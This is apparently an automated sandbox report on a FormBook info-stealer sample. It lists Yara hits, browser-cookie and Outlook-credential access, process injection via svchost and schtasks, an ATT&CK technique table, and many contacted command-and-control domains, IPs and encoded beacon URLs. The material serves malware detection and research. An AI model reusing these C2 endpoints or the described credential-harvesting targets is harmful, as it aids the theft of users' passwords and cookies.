            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Doc 784-01965670.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: Doc 784-01965670.exeBinary or memory string: WIN_XP
            Source: Doc 784-01965670.exeBinary or memory string: WIN_XPe
            Source: Doc 784-01965670.exeBinary or memory string: WIN_VISTA
            Source: Doc 784-01965670.exeBinary or memory string: WIN_7

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Scheduled Task/Job            		2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539643 Sample: Doc 784-01965670.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 28 www.sailforever.xyz 2->28 30 www.launchdreamidea.xyz 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 6 other signatures 2->50 10 Doc 784-01965670.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 jEsBIhfnof.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 schtasks.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 jEsBIhfnof.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.sailforever.xyz 103.106.67.112, 53160, 53171, 53184 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 22->34 36 www.givingaway123.net 103.224.182.242, 53228, 53229, 53230 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Doc 784-01965670.exe53%ReversingLabsWin32.Trojan.AutoitInject
            Doc 784-01965670.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            		217.70.184.50
            		truetrue
              		unknown
              booosted.xyz
              		3.33.130.190
              		truetrue
                		unknown
                www.launchdreamidea.xyz
                		188.114.96.3
                		truetrue
                  		unknown
                  www.drevohome.shop
                  		94.23.162.163
                  		truetrue
                    		unknown
                    longg002.cn
                    		8.210.49.139
                    		truetrue
                      		unknown
                      www.rudemyvague.info
                      		52.13.151.179
                      		truetrue
                        		unknown
                        www.itemsort.shop
                        		188.114.97.3
                        		truetrue
                          		unknown
                          030002837.xyz
                          		65.21.196.90
                          		truetrue
                            		unknown
                            www.productanalytics.pro
                            		94.23.162.163
                            		truetrue
                              		unknown
                              mondayigboleague.info
                              		3.33.130.190
                              		truetrue
                                		unknown
                                www.givingaway123.net
                                		103.224.182.242
                                		truetrue
                                  		unknown
                                  ethetf.digital
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    www.sailforever.xyz
                                    		103.106.67.112
                                    		truetrue
                                      		unknown
                                      www.jagdud.store
                                      		209.74.64.187
                                      		truetrue
                                        		unknown
                                        www.030002837.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.booosted.xyz
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.djazdgc.tokyo
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.stocksm.fun
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.mondayigboleague.info
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.gws-treinamento2.shop
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    50.23.12.20.in-addr.arpa
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.kmjai8jf.icu
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.ethetf.digital
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.launchdreamidea.xyz/bd77/true
                                                            		unknown
                                                            http://www.ethetf.digital/m7sk/true
                                                              		unknown
                                                              http://www.ethetf.digital/m7sk/?DrelH=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC80JPe0JQf+HZnvaZlGu7qv/1z0bLdCqC2RrE0forVuM7BfA==&Sx=gnM4ZHtrue
                                                                		unknown
                                                                http://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&Sx=gnM4ZHtrue
                                                                  		unknown
                                                                  http://www.030002837.xyz/y045/?Sx=gnM4ZH&DrelH=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopc2q7pRx51jA4E/xrfKHMwg9y+RaF/+hNtwtULy/7l6WTkA==true
                                                                    		unknown
                                                                    http://www.stocksm.fun/0bvj/true
                                                                      		unknown
                                                                      http://www.booosted.xyz/12c7/?Sx=gnM4ZH&DrelH=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqOWVPblob6mrlgni+LdLmL1Exd/23ibR2hwRjCv5+3cT01Q==true
                                                                        		unknown
                                                                        http://www.productanalytics.pro/9vwi/true
                                                                          		unknown
                                                                          http://www.productanalytics.pro/9vwi/?Sx=gnM4ZH&DrelH=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32ZlZ5K0mO0jPWZdMrvyGAaZ//vvCziC5VbEt1mIxURveK1Q==true
                                                                            		unknown
                                                                            http://www.030002837.xyz/y045/true
                                                                              		unknown
                                                                              http://www.itemsort.shop/qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZHtrue
                                                                                		unknown
                                                                                http://www.launchdreamidea.xyz/bd77/?Sx=gnM4ZH&DrelH=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHCyUpz7x/SzvZhSZv0Dea0KcHBDKlEtGKZJ6Ek0LYLRuKiHQ==true
                                                                                  		unknown
                                                                                  http://www.jagdud.store/qxse/true
                                                                                    		unknown
                                                                                    http://www.rudemyvague.info/t7t4/true
                                                                                      		unknown
                                                                                      http://www.rudemyvague.info/t7t4/?DrelH=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3IkusQQuIzTW/Q+d1GThbq9ZzxZjoWmxr4FVA7qWfBnIN3A==&Sx=gnM4ZHtrue
                                                                                        		unknown
                                                                                        http://www.drevohome.shop/v2k8/true
                                                                                          		unknown
                                                                                          http://www.drevohome.shop/v2k8/?DrelH=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM6qnxKBkcbq4MueVVV3XCfWAmAkUYQmNwrZeqvG2HfhRonQ==&Sx=gnM4ZHtrue
                                                                                            		unknown
                                                                                            http://www.mondayigboleague.info/t10u/true
                                                                                              		unknown
                                                                                              http://www.booosted.xyz/12c7/true
                                                                                                		unknown
                                                                                                http://www.djazdgc.tokyo/0628/?DrelH=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+AigTeJIoAagnD1dxA2tH0NgWMQZxZA+Ob34DrkJtsSinzg==&Sx=gnM4ZHtrue
                                                                                                  		unknown
                                                                                                  http://www.sailforever.xyz/hshp/true
                                                                                                    		unknown
                                                                                                    http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA==&Sx=gnM4ZHtrue
                                                                                                      		unknown
                                                                                                      http://www.givingaway123.net/1juc/true
                                                                                                        		unknown
                                                                                                        http://www.mondayigboleague.info/t10u/?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZHtrue
                                                                                                          		unknown
                                                                                                          http://www.stocksm.fun/0bvj/?Sx=gnM4ZH&DrelH=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYk+as1PFyE+cpyOrA06AWAI1QWZMBKp1vuYqItDMniQ0DBw==true
                                                                                                            		unknown
                                                                                                            http://www.jagdud.store/qxse/?DrelH=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85P9Ge9YW+EOCG2iwxhwrHmW9o/3mDrh1ZK5nR7QXShQvwtw==&Sx=gnM4ZHtrue
                                                                                                              		unknown
                                                                                                              http://www.djazdgc.tokyo/0628/true
                                                                                                                		unknown

                                                                                                                URLs from Memory and Binaries

                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                https://duckduckgo.com/chrome_newtabschtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://duckduckgo.com/ac/?q=schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoschtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://duckduckgo.com/?q=schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.icann.org/resources/pages/non-response-2014-01-29-enjEsBIhfnof.exe, 00000006.00000002.4509603605.00000000040B2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://emailverification.info/jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000040B2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://www.gandi.net/en/domainschtasks.exe, 00000004.00000002.4510450854.0000000004230000.00000004.10000000.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003F20000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000004244000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://ac.ecosia.org/autocomplete?q=schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.productanalytics.projEsBIhfnof.exe, 00000006.00000002.4511141181.00000000056A1000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchschtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://whois.gandi.net/en/results?search=stocksm.funschtasks.exe, 00000004.00000002.4510450854.0000000004230000.00000004.10000000.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003F20000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckPjEsBIhfnof.exe, 00000006.00000002.4509603605.0000000003A6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=schtasks.exe, 00000004.00000002.4512046943.0000000007556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  8.210.49.139
                                                                                                                                  		longg002.cnSingapore
                                                                                                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                  103.106.67.112
                                                                                                                                  		www.sailforever.xyzNew Zealand
                                                                                                                                  		56030VOYAGERNET-AS-APVoyagerInternetLtdNZtrue
                                                                                                                                  209.74.64.187
                                                                                                                                  		www.jagdud.storeUnited States
                                                                                                                                  		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                                  65.21.196.90
                                                                                                                                  		030002837.xyzUnited States
                                                                                                                                  		199592CP-ASDEtrue
                                                                                                                                  188.114.97.3
                                                                                                                                  		www.itemsort.shopEuropean Union
                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                  94.23.162.163
                                                                                                                                  		www.drevohome.shopFrance
                                                                                                                                  		16276OVHFRtrue
                                                                                                                                  188.114.96.3
                                                                                                                                  		www.launchdreamidea.xyzEuropean Union
                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                  103.224.182.242
                                                                                                                                  		www.givingaway123.netAustralia
                                                                                                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                  217.70.184.50
                                                                                                                                  		webredir.vip.gandi.netFrance
                                                                                                                                  		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                                                                                                  52.13.151.179
                                                                                                                                  		www.rudemyvague.infoUnited States
                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                  3.33.130.190
                                                                                                                                  		booosted.xyzUnited States
                                                                                                                                  		8987AMAZONEXPANSIONGBtrue

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1539643
                                                                                                                                  Start date and time:2024-10-22 22:55:07 +02:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 10m 23s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:7
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:2
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:Doc 784-01965670.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@17/11
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 75%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 91%
                                                                                                                                  • Number of executed functions: 38
                                                                                                                                  • Number of non-executed functions: 316
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • VT rate limit hit for: Doc 784-01965670.exe

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  16:56:53API Interceptor13436804x Sleep call for process: schtasks.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  8.210.49.139BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.djazdgc.tokyo/0628/
                                                                                                                                  103.106.67.112BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.sailforever.xyz/hshp/
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.sailforever.xyz/hshp/
                                                                                                                                  209.74.64.187BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jagdud.store/qxse/
                                                                                                                                  rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.turnnex.online/dhzn/
                                                                                                                                  ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.goldpal.xyz/ym9o/
                                                                                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jagdud.store/qxse/
                                                                                                                                  PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.cotxot.info/fqdb/
                                                                                                                                  FDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.selectox.xyz/b26r/
                                                                                                                                  65.21.196.90TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002832.xyz/o2wj/
                                                                                                                                  BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002837.xyz/y045/
                                                                                                                                  rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.030002832.xyz/k59q/
